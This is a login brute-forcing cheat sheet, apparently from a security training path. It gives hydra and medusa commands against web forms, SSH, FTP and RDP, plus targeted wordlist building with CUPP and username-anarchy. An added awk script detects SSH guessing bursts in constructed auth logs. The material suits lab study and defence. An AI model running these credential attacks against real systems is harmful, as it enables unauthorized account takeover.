Login Brute-Forcing
Online credential attacks from the CWES path: hydra (HTTP forms, SSH, FTP, RDP), medusa, and custom wordlist generation with username-anarchy, CUPP and policy filters. Every command separated.
Hydra
HTTP POST form - detect failure by error string:
hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt -f IP -s PORT http-post-form "/:username=^USER^&password=^PASS^:F=Invalid credentials"
HTTP POST form - detect success by 302 redirect:
hydra -l admin -P passwords.txt www.example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302"
HTTP Basic Auth:
hydra -l basic-auth-user -P passwords.txt 127.0.0.1 http-get / -s 81
SSH on a specific port:
hydra -l satwossh -P passwords.txt ssh://IP:PORT
FTP on a non-standard port:
hydra -L usernames.txt -P passwords.txt -s 2121 -V ftp.example.com ftp
RDP with generated passwords:
hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 192.168.1.100 rdp
Medusa
SSH:
medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh
FTP (e.g. from inside an SSH pivot against localhost):
medusa -h 127.0.0.1 -u ftpuser -P passwords.txt -M ftp -t 5
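Seen from the server side, the SSH runs in the Hydra and Medusa sections show up in sshd's auth log as a burst of "Failed password" lines from one source address. The script below is an added example, not part of the original cheat sheet, that finds such bursts with a per-IP sliding window. The function names, thresholds and log lines are constructed for illustration, and it assumes OpenSSH's usual syslog line format with all events on one day.

```shell
#!/bin/sh
# Added example: flag source IPs whose sshd password failures cluster in a short window.

# Constructed sample lines in OpenSSH's syslog format (not real traffic).
sample_auth_log() {
cat <<'EOF'
Jan 12 10:00:01 host sshd[2101]: Failed password for satwossh from 203.0.113.7 port 40112 ssh2
Jan 12 10:00:02 host sshd[2102]: Failed password for satwossh from 203.0.113.7 port 40114 ssh2
Jan 12 10:00:02 host sshd[2103]: Failed password for invalid user admin from 203.0.113.7 port 40116 ssh2
Jan 12 10:00:03 host sshd[2104]: Failed password for satwossh from 203.0.113.7 port 40118 ssh2
Jan 12 10:00:04 host sshd[2105]: Failed password for invalid user admin from 203.0.113.7 port 40120 ssh2
Jan 12 10:00:05 host sshd[2106]: Failed password for satwossh from 203.0.113.7 port 40122 ssh2
Jan 12 10:03:10 host sshd[2110]: Failed password for jane from 198.51.100.20 port 51000 ssh2
Jan 12 10:03:25 host sshd[2110]: Accepted password for jane from 198.51.100.20 port 51000 ssh2
Jan 12 10:10:00 host sshd[2120]: Failed password for root from 192.0.2.55 port 33000 ssh2
Jan 12 10:30:00 host sshd[2121]: Failed password for root from 192.0.2.55 port 33002 ssh2
Jan 12 10:50:00 host sshd[2122]: Failed password for root from 192.0.2.55 port 33004 ssh2
EOF
}

# detect_ssh_guessing THRESHOLD WINDOW_SECONDS < auth.log
# Prints "ip peak_failures_in_window distinct_usernames" for each IP at or over THRESHOLD.
# Assumption: all lines fall on one day, so only HH:MM:SS is compared.
detect_ssh_guessing() {
    awk -v thr="$1" -v win="$2" '
    / sshd\[[0-9]+\]: Failed password for / && $(NF-4) == "from" {
        split($3, t, ":"); now = t[1] * 3600 + t[2] * 60 + t[3]
        # Parse from the end of the line so an odd username cannot shift the fields.
        ip = $(NF-3); user = $(NF-5)
        if (!(ip in head)) head[ip] = 1
        ts[ip, ++n[ip]] = now
        # Drop failures that have aged out of the window, then record the peak.
        while (now - ts[ip, head[ip]] > win) head[ip]++
        cur = n[ip] - head[ip] + 1
        if (cur > peak[ip]) peak[ip] = cur
        if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END { for (ip in peak) if (peak[ip] >= thr) print ip, peak[ip], users[ip] }
    ' | sort
}

# Five or more failures inside 60 seconds: only the burst source is reported.
sample_auth_log | detect_ssh_guessing 5 60
```

A short window catches the burst but not the slow source at 192.0.2.55; widening the window and lowering the threshold (for example `3 3600`) reports both.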
Custom wordlists
Username variations from a real name:
./username-anarchy Jane Smith > jane_smith_usernames.txt
CUPP - targeted list from personal info:
cupp -i
Filter a wordlist to a password policy (8+ chars, upper, lower, digit):
grep -E '^.{8,}$' darkweb2017-top10000.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' > final.txt